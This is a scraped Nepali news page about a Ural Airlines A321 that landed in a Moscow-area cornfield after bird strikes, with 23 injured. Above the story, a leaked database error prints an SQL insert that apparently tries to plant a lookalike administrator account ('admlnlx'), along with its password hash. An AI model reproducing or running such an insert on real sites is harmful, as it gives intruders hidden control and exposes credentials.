WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BhtW0RZ5IbcDZrywrevRAE/HIJ3hpZ/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 09:47:03', '', 'admlnlx', 'admlnlx')
२ सय ३३ जना यात्रुसहितको जहाज मकैबारीमा आपतकालीन अवतरण
मस्को: २ सय ३३ जना यात्रुसहितको एउटा रुसी जहाज मस्को नजिकै आपतकालीन अवतरण गराइएको छ ।
चराहरुको हूल जहाजको इन्जिनमै ठोक्किँदा दुबै इन्जिन बन्द भएपछि आपतकालीन अवतरण गराउनु परेको बताइएको छ । उरल एयरलाइन्सको ए ३२१ एयरबस २ सय २६ यात्रु र सातजना चालकदलका सदस्यसहित मस्कोको जुकोब्सकी एयरपोर्टबाट सिम्फेरोपोल एयरपोर्टका लागि उँडेको थियो ।
इन्जिन अफ भएपछि तत्कालै मकै खेती भएको खुला जमिनमै अवतरण गराइएको थियो ।
स्वास्थ्य मन्त्रालयका अनुसार नौ बालबालिका सहित २३ जना घाइते भएका छन्
एजेन्सी